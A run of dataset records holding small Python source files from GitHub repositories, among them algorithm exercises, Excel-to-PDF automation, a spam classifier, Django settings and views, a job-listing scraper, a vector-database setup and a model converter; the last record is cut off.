TreeNode(3)\n root.left.right = TreeNode(4)\n root.left.left.left = TreeNode(6)\n root.left.left.right = TreeNode(7)\n root.left.right.left = TreeNode(8)\n root.right.right = TreeNode(5)\n root.right.right.left = TreeNode(9)\n self.assertEqual([0, 1, 3, 6, 7, 4, 8, 2, 5, 9], s.preorderTraversal(root))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"jicahoo/pythonalgr","sub_path":"leetcode/144_BinaryTreePreorderTraversal.py","file_name":"144_BinaryTreePreorderTraversal.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"3379716725","text":"import pandas as pd\nimport openpyxl\nfrom win32com import client\nimport win32api\nimport os\n\n\n#load info of customer from masterlist\n\ndata = pd.read_excel('NameList.xlsx', sheet_name = ['template'])\nmasterList = data[\"template\"]\ncustomerList = masterList.head(masterList.index.stop)\nexcel = client.Dispatch(\"Excel.Application\")\n\n#extract info from raw list and append to array\n\ncustomerDetails = []\n\nfor ind,row in customerList.iterrows():\n f=[]\n for z in row:\n f.append(z)\n customerDetails.append(f)\nprint(customerDetails)\n\n#append customer details array with CIPL template\n\nciplWorkbook=openpyxl.load_workbook('CIPL.xlsx')\nciWorksheet = ciplWorkbook[\"CI\"]\nplWorksheet= ciplWorkbook[\"PL\"]\n\n# to get the location of the current python file\nbasedir = os.path.dirname(os.path.abspath(__file__))\n\n# to join it with the filename\ncategorization_file = os.path.join(basedir,'CIPL.xlsx')\n\nfor details in customerDetails:\n\n #assign variables to the info array\n customerNames = details[0]\n attention = details[1]\n customerAddress = details[2]\n customerPhone = details[3]\n ciNo = details[4]\n plNo = details[5]\n poRef = details[6]\n\n #append info to the CI sheet\n \n ciWorksheet['D12'] = customerNames\n ciWorksheet['D14'] = customerAddress\n ciWorksheet['D20'] = attention\n ciWorksheet['D21'] = customerPhone\n ciWorksheet['L12'] = ciNo\n ciWorksheet['L13'] = poRef\n\n #append info to the PL sheet\n\n plWorksheet['D12'] = customerNames\n plWorksheet['D14'] = customerAddress\n plWorksheet['D20'] = attention\n plWorksheet['D21'] = customerPhone\n plWorksheet['L12'] = plNo\n plWorksheet['L13'] = poRef\n\n #save the excel with the ammended info\n ciplWorkbook.save(\"CIPL.xlsx\")\n sheets = excel.Workbooks.Open(categorization_file)\n work_sheets_CI = sheets.Worksheets[0]\n work_sheets_PL = sheets.Worksheets[1]\n \n # Convert into PDF File\n ci_pdf = f'{ciNo}.pdf'\n pl_pdf = f'{plNo}.pdf'\n\n ci_file = os.path.join(basedir, ci_pdf)\n pl_file = os.path.join(basedir, pl_pdf)\n\n work_sheets_CI.ExportAsFixedFormat(0, ci_file)\n print(f\"{ciNo}({customerNames}) has been succesfully saved as PDF\")\n \n work_sheets_PL.ExportAsFixedFormat(0, pl_file)\n print(f\"{plNo}({customerNames}) has been succesfully saved as PDF\")\n\n sheets.Close(True)\n","repo_name":"mirzafahmi/CIPL","sub_path":"CIPL.py","file_name":"CIPL.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"1125432562","text":"import math\nfrom collections import defaultdict\n\n# Step 1: Load the dataset\ndef load_dataset(file_path):\n dataset = []\n with open(file_path, 'r') as file:\n for line in file:\n label, text = line.strip().split('\\t')\n dataset.append((text, label))\n return dataset\n\n# Step 2: Split the dataset into training and testing sets\ndef split_dataset(dataset, split_ratio=0.8):\n split_index = int(len(dataset) * split_ratio)\n train_set = dataset[:split_index]\n test_set = dataset[split_index:]\n return train_set, test_set\n\n# Step 3: Train the Naive Bayes classifier\ndef train_naive_bayes(train_set):\n # Count the occurrences of each word and the total words in each class\n class_word_counts = defaultdict(lambda: defaultdict(int))\n class_total_words = defaultdict(int)\n vocabulary = set()\n\n for text, label in train_set:\n words = text.lower().split()\n class_word_counts[label]['__total__'] += len(words)\n class_total_words[label] += len(words)\n\n for word in words:\n class_word_counts[label][word] += 1\n vocabulary.add(word)\n\n # Calculate the prior probability of each class\n total_docs = len(train_set)\n class_priors = {label: math.log(count / total_docs) for label, count in class_total_words.items()}\n\n # Calculate the conditional probabilities\n class_cond_probs = defaultdict(lambda: defaultdict(float))\n for label in class_word_counts:\n for word in vocabulary:\n word_count = class_word_counts[label][word]\n total_words_in_class = class_word_counts[label]['__total__']\n class_cond_probs[label][word] = math.log((word_count + 1) / (total_words_in_class + len(vocabulary)))\n\n return class_priors, class_cond_probs, vocabulary\n\n# Step 4: Predict the class of a test instance\ndef predict_naive_bayes(text, class_priors, class_cond_probs, vocabulary):\n words = text.lower().split()\n\n scores = {}\n for label in class_priors:\n score = class_priors[label]\n for word in words:\n if word in vocabulary:\n score += class_cond_probs[label][word]\n scores[label] = score\n\n predicted_label = max(scores, key=scores.get)\n return predicted_label\n\n# Step 5: Evaluate the classifier using the test set\ndef evaluate_naive_bayes(test_set, class_priors, class_cond_probs, vocabulary):\n correct_predictions = 0\n\n for text, label in test_set:\n predicted_label = predict_naive_bayes(text, class_priors, class_cond_probs, vocabulary)\n if predicted_label == label:\n correct_predictions += 1\n\n accuracy = correct_predictions / len(test_set)\n return accuracy\n\n# Load the dataset\ndataset = load_dataset('sms_spam_collection.txt')\n\n# Split the dataset into training and testing sets\ntrain_set, test_set = split_dataset(dataset, split_ratio=0.8)\n\n# Train the Naive Bayes classifier\nclass_priors, class_cond_probs, vocabulary = train_naive_bayes(train_set)\n\n# Evaluate the classifier\naccuracy = evaluate_naive_bayes(test_set, class_priors, class_cond_probs, vocabulary)\nprint(f\"Accuracy: {accuracy:.2%}\")\n","repo_name":"NeedAvailableName/ML-DM","sub_path":"bayes/sms_spam.py","file_name":"sms_spam.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"15897610688","text":"productoTerminadoUno = {\n \"referencia\": 5087,\n \"marca\": \"Americanino\",\n \"descripcion\": \"Chompa de acampargo\",\n \"color\": \"Naranja\",\n \"costoUnitario\": 100000,\n \"disponibleBodegan\": True,\n \"costoVenta\": 850000,\n \"puntosVenta\": [\n \"Cc Mayorca\",\n \"Terminal del Norte\",\n \"Puerta del norte\",\n \"Centro de la moda\",\n ],\n}\n\nproductoTerminadoDos = {\n \"referencia\": 5088,\n \"marca\": \"Americanino\",\n \"descripcion\": \"Camiseta Polo\",\n \"color\": \"Azul oscuro\",\n \"costoUnitario\": 30000,\n \"disponibleBodegan\": True,\n \"costoVenta\": 150000,\n \"puntosVenta\": [\n \"Cc Mayorca\",\n \"Terminal del Norte\",\n \"Puerta del norte\",\n \"Centro de la modale\",\n ],\n}\n\n# CREANDO UNA LISTA DE DICCIONARIOS\nproductos = [productoTerminadoUno, productoTerminadoDos]\n\n# Recorriendo un lista con ciclo FOR\n\"\"\"for contador in range(1,10,2):\n print(contador)\"\"\"\n\nfor producto in productos:\n for puntodeVenta in producto[\"puntosVenta\"]:\n print(puntodeVenta)\n","repo_name":"lesuduque/inventariopythonuribe","sub_path":"diccionario.py","file_name":"diccionario.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18847956866","text":"# Django settings for gonzo project.\nimport os\n\nPROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n # ('Your Name', 'your_email@domain.com'),\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': '', # Or path to database file if using sqlite3.\n 'USER': '', # Not used with sqlite3.\n 'PASSWORD': '', # Not used with sqlite3.\n 'HOST': '', # Set to empty string for localhost. Not used with sqlite3.\n 'PORT': '', # Set to empty string for default. Not used with sqlite3.\n }\n}\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# On Unix systems, a value of None will cause Django to use the same\n# timezone as the operating system.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'UTC'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale\nUSE_L10N = True\n\n# Absolute path to the directory that holds media.\n# Example: \"/home/media/media.lawrence.com/\"\nMEDIA_ROOT = os.path.join(PROJECT_ROOT, '../media/')\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash if there is a path component (optional in other cases).\n# Examples: \"http://media.lawrence.com\", \"http://example.com/media/\"\nMEDIA_URL = '/media/'\n\n# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a\n# trailing slash.\n# Examples: \"http://foo.com/media/\", \"/media/\".\nADMIN_MEDIA_PREFIX = '/admin/media/'\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = '%%wx$yiag9%t+ncj!ozqqid4b=wjlx2ra*=(p284j&uezh@@mi'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n \"django.contrib.auth.context_processors.auth\",\n \"django.core.context_processors.debug\",\n \"django.core.context_processors.i18n\",\n \"django.core.context_processors.media\",\n \"django.core.context_processors.request\",\n \"django.contrib.messages.context_processors.messages\",\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.gzip.GZipMiddleware',\n 'debug_toolbar.middleware.DebugToolbarMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware'\n)\n\nROOT_URLCONF = 'gonzo.urls'\n\nTEMPLATE_DIRS = (\n os.path.join(PROJECT_ROOT, '../templates/'),\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.admin',\n 'gonzo.hunt',\n 'gonzo.api',\n 'gonzo.account',\n 'gonzo.oauth',\n 'gonzo.phrase',\n 'gonzo.webapp',\n 'gonzo.utils',\n 'gonzo.connectors.twitter',\n 'gonzo.connectors.email',\n 'debug_toolbar'\n)\nCELERY_IMPORTS=(\n 'gonzo.account.tasks',\n 'gonzo.hunt.tasks'\n)\n\n#\n# Authentication backends\n#\nAUTHENTICATION_BACKENDS = (\n 'django.contrib.auth.backends.ModelBackend',\n 'gonzo.connectors.twitter.backends.TwitterAuthBackend'\n)\n\n#\n# Email\n#\nEMAIL_HOST='localhost'\nEMAIL_PORT=1025\n\n#\n# Authentication configuration\n#\nAUTH_PROFILE_MODULE='account.Profile'\nLOGIN_URL='/account/signin/'\nLOGIN_REDIRECT_URL='/account/profile/'\nSIGNUP_EMAIL_WHITELIST=()\n\n# Hunt email prefix\nHUNT_EMAIL_USER='hunt'\n\nfrom datetime import timedelta\n\n# TODO: Split these out into separate variables,\n# because this way makes it damn near impossible to override a single one.\nGAME_SETTINGS={\n # If True, it will delete any finished and unplayed hunts\n # (a hunt in which no one has voted is considered \"unplayed\")\n 'delete_unplayed': True,\n # If True, we will create a new hunt if there are none current\n 'keep_active': True,\n # Username of the default owner.\n 'default_owner': 'huntmaster',\n # Default duration\n 'default_duration': timedelta(days=1),\n}\n# Allow the same user to submit as many photos to a hunt.\n# This really only should be used for debugging.\nGAME_ALLOW_MULTI_SUBMIT=False\n\n#\n# Debug toolbar\n#\nINTERNAL_IPS=('127.0.0.1',)\nDEBUG_TOOLBAR_CONFIG={\n 'INTERCEPT_REDIRECTS': False\n}\n\n\nimport sys\n\nlocal_settings_name = os.environ.get('GONZO_LOCAL_SETTINGS_MODULE', 'local_settings')\ntry:\n __import__(local_settings_name)\n\n local = sys.modules[local_settings_name]\n this = sys.modules[__name__]\n\n # This mimics 'from local_settings import *'\n for name in dir(local):\n if not name.startswith('_'):\n setattr(this, name, getattr(local, name))\n\nexcept ImportError:\n pass\n\n","repo_name":"paulcwatts/1hph","sub_path":"gonzo/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5757,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"38026400633","text":"import mechanicalsoup\nimport json\nfrom random import randint\nimport os\n\n## https://developers.whatismybrowser.com/useragents/explore/\nagents = [\n'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',\n'Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',\n'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)',\n'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393',\n'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Mwendo/1.1.5 Safari/537.21',\n'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',\n'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 OPR/43.0.2442.991'\n]\nindex = randint(0, len(agents)-1)\nagent = agents[index]\nurl = 'https://www.glassdoor.ie/Job/sydney-research-engineer-jobs-SRCH_IL.0,6_IC2235932_KO7,24.htm'\nbrowser = mechanicalsoup.StatefulBrowser(\n soup_config = {'features': 'lxml'}, # Use the lxml HTML parser\n raise_on_404 = True,\n user_agent = agent,\n)\nbrowser.open(url)\nsoup = browser.get_current_page()\nlinks = soup.find_all(name='div',attrs={'class':'flexbox jobTitle'})\nlocations = soup.find_all(name='div',attrs={'class':'flexbox empLoc'})\nprint(len(links), len(locations))\nbase_url = 'https://www.glassdoor.com'\n\n# for i in links:\n# print({'title':i.div.a.string, 'url':base_url + i.div.a['href']})\n\n# for i in locations:\n# print({'employer':i.div.contents[0].strip(), 'location':i.div.contents[1].string})\n\ntitle_url = [{'title':i.div.a.string, 'url':base_url + i.div.a['href']} for i in links]\nemp_loc = [{'employer':i.div.contents[0].strip(), 'location':i.div.contents[1].string} for i in locations]\n\ndict_list = list(zip(title_url, emp_loc))\n# print(dict_list[0])\nr = [{**i[0], **i[1]} for i in zip(title_url, emp_loc)]\nprint(r)\n\nans = soup.prettify()\n# print(ans)\nprint(index, agent)\nfilename = os.path.join(os.getcwd(), 'spider.txt')\nprint(filename)\nwith open(filename, 'w') as text_file:\n print(ans, file=text_file)\nbrowser.close()\n\n# import sys\n# print(os.getcwd())\n# print(sys.argv[0])\n# print(os.path.dirname(os.path.realpath('__file__')))\n","repo_name":"luosz/colab","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70633443351","text":"import os\n\ntrees = []\n\ndef import_trees(tree_file):\n \"\"\"\n Import the file containing \"trees\" which are numbers arranged in a grid.\n Each number is converted to an integer and stored into a multidimensional array.\n Eg: A 3x3 grid of incrementing numbers stores the following: [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\n\n Args:\n tree_file (str): The filename (or filepath) containing the \"trees\" to be imported\n \"\"\"\n global trees\n try:\n with open(tree_file, \"r\") as f:\n # create a list of each line in the file\n file_lines = f.readlines()\n\n # loop through each line so we can break up the line into a list of numbers\n for line in file_lines:\n\n # in one foul swoop we strip the string of it's newline, convert each number to an integer and create a list containing those numbers\n # we go through the trouble of converting the integers because we want to be able to compare the tree heights against each other\n line_array = [int(x) for x in list(line.strip())]\n\n # now we just append this array to our multidimensional array\n trees.append(line_array)\n except Exception as e:\n print(f\"Error opening tree file: {e}\")\n exit(1)\n\ndef color_print(color, text, end = \"\\n\"):\n \"\"\"\n Prints the chosen message in a specific color to the terminal.\n Available colors are: purple, blue, cyan, green, orange, red, underline\n (PS: It pains me to type \"color\" instead of \"colour\" but that's how the cookie crumbles xD)\n\n Args:\n color (str) : The color used to print the message\n text (str) : The text to print in the console\n end (str) : The character to end the print with (default is newline)\n \"\"\"\n all_colors = {\n \"purple\": \"\\033[95m\",\n \"blue\": \"\\033[94m\",\n \"cyan\": \"\\033[96m\",\n \"green\": \"\\033[92m\",\n \"orange\": \"\\033[93m\",\n \"red\": \"\\033[91m\",\n \"underline\": \"\\033[4m\"\n }\n print(f\"{all_colors[color]}{text}\"+\"\\033[0m\", end = end)\n\ndef search_left_and_right(row):\n global trees\n visible_indexes = []\n\n # we search from left to right, counting the number of visible trees in that direction\n # the range is len(row)-2 because -1 ensures we stay within range of the array and -2 ensures we don't check the last tree in the row (it's always visible)\n biggest_index = 0\n for v in range(0, len(row)-2):\n # if the tree to the right is taller than the current tallest tree, set it as the tallest and remember it's index\n if row[v+1] > row[biggest_index]:\n biggest_index = v+1\n visible_indexes.append(v+1)\n\n # now we search from right to left, stopping if we encounter the tallest tree from the left-to-right search\n biggest_index = len(row)-1\n for v in range(len(row)-1, 1, -1):\n \n # if we encounter a tree that is already visible, we can stop checking the remaining trees in the row\n if (v-1) in visible_indexes:\n break\n \n # as before, we check if the tree to the left is taller than the current tallest tree\n if row[v-1] > row[biggest_index]:\n biggest_index = v-1\n visible_indexes.append(v-1)\n return visible_indexes\n\ndef calc_visible_trees():\n global trees\n visible_tree_coordinates = set()\n\n # # preview the tree layout\n # print(\"Tree Layout:\\n\")\n # for row in trees:\n # for tree in row:\n # print(tree, end=\"\")\n # print()\n # print(f\"\\n{'-'*48}\\n\")\n \n # search rows for trees\n for x in range(1, len(trees)-1):\n # pass each row to the search function and store tree coordinates into the main coord set\n for coord in search_left_and_right(trees[x]):\n visible_tree_coordinates.add((coord, x))\n\n # search columns for trees (we can re-use the same function used with rows by treating a top-and-bottom search as left-and-right)\n for x in range(1, len(trees[0])-1):\n # pass each column to the search function and store tree coordinates into the main coord set\n col = [row[x] for row in trees]\n for coord in search_left_and_right(col):\n visible_tree_coordinates.add((x, coord))\n\n \n color_print(\"underline\", f\"Final Tree Grid:\")\n print(\"Edge trees are colored blue\\nInternal visible trees are colored green\\n\")\n\n # print the final grid with colored trees, blue for edge trees and green for visible trees\n for row_index in range(0, len(trees)):\n for column_index in range(0, len(trees[row_index])):\n if row_index == 0 or row_index == len(trees)-1 or column_index == 0 or column_index == len(trees[0])-1:\n # this tree is on the edge, so it's visible (and we'll print in blue to signify this)\n color_print(\"blue\", f\"{trees[row_index][column_index]}\", end=\" \")\n else:\n # the tree isn't on an edge, check if we found its visible and if so, print it in green\n if (row_index, column_index) in visible_tree_coordinates:\n color_print(\"green\", f\"{trees[row_index][column_index]}\", end=\" \")\n else:\n print(f\"{trees[row_index][column_index]}\", end=\" \")\n print()\n\n # calculate the number of visible trees, starting with the edge trees and adding the number of visible trees within the grid\n both_columns = len(trees[0]) * 2\n both_rows = (len(trees) - 2) * 2\n edge_tree_count = both_columns + both_rows\n color_print(\"underline\", \"\\n\\nVisible Tree Count:\")\n print(f\"Edge trees: {edge_tree_count}\")\n print(f\"Internal trees: {len(visible_tree_coordinates)}\")\n print(f\"Total visible: {len(visible_tree_coordinates) + edge_tree_count}\\n\\n\\n\")\n\ndef main():\n global trees\n\n # import trees from file\n import_trees(\"08/trees.txt\")\n\n # calculate the number of visible trees\n calc_visible_trees()\n\n color_print(\"underline\", \"Part Two: Scenic Score\\n\")\n\n # loop through trees that are within the grid (ie: not edge trees) and calculate the scenic score for each\n biggest_scenic_score = 0\n\n for row_index in range(1, len(trees)-1):\n for column_index in range(1, len(trees)-1):\n left_score, right_score, top_score, bot_score = 0, 0, 0, 0\n # print(f\"row_index: {row_index}, column_index: {column_index}, value: {trees[row_index][column_index]}\")\n \n # left scenic score\n left_index = column_index - 1\n while True:\n # print(f\"looking left to column index {left_index} at tree {trees[row_index][left_index]} ...\")\n left_score += 1\n if trees[row_index][left_index] >= trees[row_index][column_index]:\n # print(f\"left tree is equal or bigger, breaking ...\")\n break\n elif left_index == 0:\n # print(\"no more trees to the left, breaking ...\")\n break\n # print(\"left tree is smaller, moving to next tree ...\")\n left_index -= 1\n \n # right scenic score\n right_index = column_index + 1\n while True:\n # print(f\"looking right to column index {right_index} at tree {trees[row_index][right_index]} ...\")\n right_score += 1\n if trees[row_index][right_index] >= trees[row_index][column_index]:\n # print(f\"right tree is equal or bigger, breaking ...\")\n break\n elif right_index == len(trees[0])-1:\n # print(\"no more trees to the right, breaking ...\")\n break\n # print(\"right tree is smaller, moving to next tree ...\")\n right_index += 1\n \n # top scenic score\n top_index = row_index - 1\n while True:\n # print(f\"looking upwards to row index {top_index} at tree {trees[top_index][column_index]} ...\")\n top_score += 1\n if trees[top_index][column_index] >= trees[row_index][column_index]:\n # print(f\"top tree is equal or bigger, breaking ...\")\n break\n elif top_index == 0:\n # print(\"no more trees upwards, breaking ...\")\n break\n # print(\"top tree is smaller, moving to next tree ...\")\n top_index -= 1\n\n # bot scenic score\n bot_index = row_index + 1\n while True:\n # print(f\"looking downwards to row index {bot_index} at tree {trees[bot_index][column_index]} ...\")\n bot_score += 1\n if trees[bot_index][column_index] >= trees[row_index][column_index]:\n # print(f\"bot tree is equal or bigger, breaking ...\")\n break\n elif bot_index == len(trees)-1:\n # print(\"no more trees downwards, breaking ...\")\n break\n # print(\"bottom tree is smaller, moving to next tree ...\")\n bot_index += 1\n\n this_scenic_score = left_score * right_score * top_score * bot_score\n # print(f\"left score: {left_score}\\nright score: {right_score}\\ntop score: {top_score}\\nbottom score: {bot_score}\\nscenic score: {this_scenic_score}\\n\\n\")\n if this_scenic_score > biggest_scenic_score:\n biggest_scenic_score = this_scenic_score\n # print()\n\n print(f\"Biggest scenic score: {biggest_scenic_score}\")\n\nif __name__ == \"__main__\":\n os.system('cls' if os.name == 'nt' else 'clear')\n main() # run main function\n print(\"\\n\\n\")","repo_name":"elijahw0lf/adventofcode-2022","sub_path":"08/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71903459993","text":"import os\nfrom dotenv import load_dotenv\nfrom qdrant_client import models, QdrantClient\nfrom sentence_transformers import SentenceTransformer\n\nload_dotenv()\nqdrant_location = os.getenv(\"QDRANT_LOCATION\")\nqdrant_port = os.getenv(\"QDRANT_PORT\")\nqdrant = QdrantClient(location=qdrant_location, port=qdrant_port)\nencoder = SentenceTransformer('all-MiniLM-L6-v2') \n\ntry:\n qdrant.recreate_collection(\n collection_name=\"vectors\",\n vectors_config=models.VectorParams(\n size=encoder.get_sentence_embedding_dimension(), # Vector size is defined by used model\n distance=models.Distance.COSINE\n )\n )\nexcept Exception as e:\n print(e)\n","repo_name":"AI-General/ExpertGPT","sub_path":"expertgpt/backend/core/setup_qdrant.py","file_name":"setup_qdrant.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"13473563016","text":"# from smb.SMBConnection import SMBConnection\nfrom django.shortcuts import render\nfrom rest_framework import viewsets, status\nfrom rest_framework.response import Response\nfrom .serializers import FileUploadSerializer, FileValidateSerializer\nfrom lsvalidate.models import LsRecord\nfrom lsvalidate.tasks import ls_upload\nfrom django.conf import settings\n# Create your views here.\n\n\nclass LsUpload(viewsets.ViewSet):\n serializer_class = FileUploadSerializer\n def list(self, request):\n\n\n\n return Response({'response_text': 'hello'}, status=status.HTTP_200_OK)\n\n def create(self, request):\n file_uploaded = request.FILES.get('file')\n file_lines = file_uploaded.read().decode().splitlines()\n ls_upload.delay(file_lines)\n response = f\"POST API and you have uploaded a {file_uploaded} file\"\n return Response(response)\n\n def delete(self, request):\n response_text = 'No DEBUG. No data delited.'\n if settings.DEBUG == 1:\n LsRecord.objects.all().delete()\n response_text = 'All data delited'\n return Response({response_text})\n\n\nclass LsValidate(viewsets.ViewSet):\n serializer_class = FileValidateSerializer\n\n def list(self, request):\n return Response({'response_text': 'hello'}, status=status.HTTP_200_OK)\n\n def post(self, request):\n\n ls = request.data.get('ls')\n\n if len(ls) == 8:\n ls_record = LsRecord.objects.filter(account_number = ls)\n else:\n ls_record = LsRecord.objects.filter(account_number_rng = ls)\n\n response = False\n if len(ls_record) !=0:\n response = True\n\n return Response(response)","repo_name":"bitinfodoc/service_docker","sub_path":"mrgServices/lsvalidate/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73277203992","text":"import torch\r\nimport argparse\r\nimport coremltools as ct\r\nfrom pathlib import Path\r\nimport sys\r\nsys.path.insert(0, '.')\r\nfrom models import *\r\n\r\n\r\ndef convert(model, variant, num_classes, checkpoint, size):\r\n \"\"\"\r\n Warning!!!! CoreML conversion will not work on Windows\r\n \"\"\"\r\n # create random input and initialize model\r\n inputs = torch.randn(1, 3, *size) \r\n pt_model = eval(model)(variant, checkpoint, num_classes, max(*size))\r\n pt_model.eval()\r\n\r\n # convert to torchscript model\r\n jit_model = torch.jit.trace(pt_model, inputs)\r\n\r\n # convert to coreml model\r\n core_ml_model = ct.convert(\r\n jit_model,\r\n inputs=[ct.ImageType('input', inputs.shape)],\r\n convert_to=\"neuralnetwork\"\r\n )\r\n\r\n # create save file \r\n checkpoint = Path(checkpoint)\r\n save_path = checkpoint.parent / f\"{checkpoint.name.split('.')[0]}.mlmodel\"\r\n\r\n # save model\r\n core_ml_model.save(save_path)\r\n print(f\"Finished converting and saved model at `{save_path}`\")\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--model', type=str, default=\"VAN\")\r\n parser.add_argument('--variant', type=str, default='S')\r\n parser.add_argument('--num_classes', type=int, default=1000)\r\n parser.add_argument('--checkpoint', type=str, default='/home/sithu/Documents/weights/backbones/van/van_small_811.pth.tar')\r\n parser.add_argument('--size', type=list, default=[224, 224])\r\n args = vars(parser.parse_args())\r\n convert(**args)","repo_name":"sithu31296/sota-backbones","sub_path":"convert/to_coreml.py","file_name":"to_coreml.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"5"} +{"seq_id":"1865056132","text":"\"web_navigator.py\"\n\nimport folium\nfrom geopy import Nominatim\nimport twitter2\n\ndef user_locations(data):\n \"Creates dictionary with user names and their locations\"\n res = dict()\n for user in data['users']:\n if len(user['location']) == 0:\n continue\n res[user['screen_name']] = user['location']\n return res\n\n\ndef coordinates(locations, geolocator):\n \"Transforms user locations into coordinates\"\n for loc in locations:\n coord = geolocator.geocode(locations[loc], timeout = None)\n if coord is None:\n continue\n locations[loc] = (coord.latitude, coord.longitude)\n return locations\n\n\ndef main(name):\n data = twitter2.get_data(name)\n location = user_locations(data)\n geolocator1 = Nominatim(user_agent=\"web_navigator.py\")\n coords = coordinates(location, geolocator1)\n\n new_map = folium.Map()\n\n layer = folium.FeatureGroup(name=\"friends locations\")\n for loc in coords:\n try:\n new_map.add_child(layer.add_child(folium.Marker(location=[coords[loc][0], \\\n coords[loc][1]], popup=loc)))\n except ValueError:\n continue\n\n new_map.save('mysite/templates/new_map.html')\n","repo_name":"akhynkokateryna/web-map-twitter","sub_path":"web_navigator.py","file_name":"web_navigator.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14574870536","text":"from algos.strings.count_volwes import vowel_counter\n\n\ndef test_volwe_counter():\n data = [\n 'abracadabra',\n 'pear tree',\n 'o a kak ushakov lil vo kashu kakao',\n 'my pyx'\n ]\n result = vowel_counter(data)\n assert result == '5 4 13 2'\n","repo_name":"myusko/algosproblems","sub_path":"tests/test_strings/test_volwe_counter.py","file_name":"test_volwe_counter.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72541697431","text":"#!/usr/bin/python\nimport Queue\nimport logging\nfrom copy import deepcopy\n\n#TODO: Fix this algo and merge with original serialized_frame_deliver\nfrom sprocket.stages.util import preprocess_config\n\n\ndef serialized_frame_with_empty_delivery_func(buffer_queues, deliver_queue, **kwargs):\n \"\"\"wait for first stage_conf['framesperchunk'] frames available frames to deliver, required for dash encode\"\"\"\n\n def merge_events(events, lineage):\n merged = {}\n sample = deepcopy(events[0])\n sample['frame_list']['metadata']['lineage'] = lineage\n\n klist = []\n for e in events:\n if e['frame_list']['key'] != None:\n klist.append(e['frame_list']['key'])\n merged['frame_list'] = {'metadata': deepcopy(sample['frame_list']['metadata']),\\\n 'type': deepcopy(sample['frame_list']['type']),\n 'key_list': klist}\n\n #if the leftover only consisted of empty frames\n if klist == []:\n merged = {}\n return {}\n else:\n return 